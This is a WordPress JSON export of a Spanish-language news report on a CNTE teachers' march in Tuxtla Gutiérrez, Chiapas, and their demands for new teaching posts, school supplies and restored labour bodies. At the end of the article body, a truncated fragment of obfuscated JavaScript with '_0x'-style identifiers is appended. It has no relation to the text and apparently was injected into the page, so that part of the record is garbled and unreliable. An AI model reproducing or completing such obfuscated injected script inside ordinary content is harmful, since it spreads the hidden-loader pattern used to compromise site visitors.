{"id":16343,"date":"2024-06-26T03:35:02","date_gmt":"2024-06-26T03:35:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16343"},"modified":"2024-06-26T03:35:03","modified_gmt":"2024-06-26T03:35:03","slug":"marcha-la-cnte-en-tuxtla-esperan-solucion-del-gobierno-federal-y-creacion-de-plazas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16343","title":{"rendered":"Marcha la CNTE en Tuxtla, esperan soluci\u00f3n del gobierno federal y creaci\u00f3n de plazas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"685\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719372771034-1024x685.jpg\" alt=\"\" class=\"wp-image-16344\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719372771034-1024x685.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719372771034-300x201.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719372771034-768x513.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719372771034-110x75.jpg 110w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719372771034.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>Este martes, miles de docentres federalizados adheridos a la Coordinadora Nacional de los Trabajadores de la Educaci\u00f3n (CNTE), realizaron una marcha para exigir soluci\u00f3n a los puntos planteados en la mesa de trabajo que se lleva a cabo en el centro del pa\u00eds.<\/p>\n\n\n\n<p>Partieron del crucero de la fuente de la Diana Cazadora al oriente de la capital, el contingente march\u00f3 sobre el Bulevar \u00c1ngel Albino Corzo, y Avenida Central, para realizar un mitin en la plancha frente al Palacio de Gobierno.<br>Ah\u00ed recordaron sus principales demandas para la educaci\u00f3n en la entidad: Expusieron como necesario la creaci\u00f3n de al menos tres mil plazas para cubrir la necesidad de maestros en educaci\u00f3n ind\u00edgena y otros niveles, relataron que hay muchos grupos sin docentes o grupos que tienen alumnos de diferentes grados combinados.<br>Aseguran esta debe ser asignadas por la autoridad y no por la propia Coordinadora.<br>El dirigente de la Secci\u00f3n 7, Isael Gonz\u00e1lez V\u00e1zquez, sostuvo como necesario restablecer la bilateralidad con la autoridad educativa en los procesos del Servicio Profesional Docente, record\u00f3 que antes exist\u00eda la Comisi\u00f3n mixta de relaciones laborales, la cual se abandon\u00f3 a partir de la reforma educativa.<br>El dirigente seccional dijo que tambi\u00e9n se plante\u00f3 la exigencia de que las autoridades estatales brinden a los estudiantes de nivel b\u00e1sico uniformes y \u00fatiles escolares. Como se hizo en 2013 y 2016. Adem\u00e1s exigieron la reactivaci\u00f3n de la caja de ahorro y fortalecer la infraestructura f\u00edsica educativa.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Este martes, miles de docentres federalizados adheridos a la Coordinadora Nacional de los Trabajadores de la Educaci\u00f3n (CNTE), realizaron una marcha para exigir soluci\u00f3n a los puntos planteados en la mesa de trabajo que se lleva a cabo en el centro del pa\u00eds. Partieron del crucero de la fuente de la Diana Cazadora &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16344,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-16343","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16343","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16343"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16343\/revisions"}],"predecessor-version":[{"id":16345,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16343\/revisions\/16345"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16344"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16343"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16343"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16343"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}